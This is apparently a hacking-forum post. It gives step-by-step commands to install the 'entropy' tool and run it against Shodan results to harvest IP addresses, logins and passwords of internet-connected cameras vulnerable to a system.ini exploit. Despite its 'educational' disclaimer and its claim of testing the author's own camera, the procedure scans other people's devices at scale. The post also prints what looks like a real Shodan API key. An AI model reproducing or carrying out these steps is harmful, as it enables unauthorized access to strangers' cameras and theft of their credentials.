Mutt
Professional
- Messages
- 1,457
- Reaction score
- 1,266
- Points
- 113
This article is for educational purposes only and does not call for action!
To test MY camera for resistance to the system.ini exploit, I used Kali Linux (although not only it is possible).
First, clone the entropy repository:
Code:
git clone https://github.com/entynetproject/entropy.git
Go to the directory with the utility:
Code:
cd entropy
We assign the rights to run the installer:
Code:
chmod + x install.sh
And install the utility itself:
Code:
./install.sh
But the utility did not want to work for me without installing the dependencies, so I had to enter such a command. In your case, you may have to enter pip or pip2if there are errors. It depends on the version of python you will be using.
Code:
pip3 install -r requirements.txt
Now checking in shodan, and get an API key.
After that, we launch the utility itself, specifying our Shodan API key:[/B]
Code:
python3 entropy.py -b 2 -v --shodan "o7X2SlIJiidq3XgA9iM8t34HYj69pB7T"
And to filter the output (so that we only display a list of vulnerable cameras), we will use the grep utility:
Code:
python3 entropy.py -b 2 -v --shodan "o7X2SlIJiidq3XgA9iM8t34HYj69pB7T" | grep [+]
As a result, you will see the IP, login and password of the vulnerable camera.
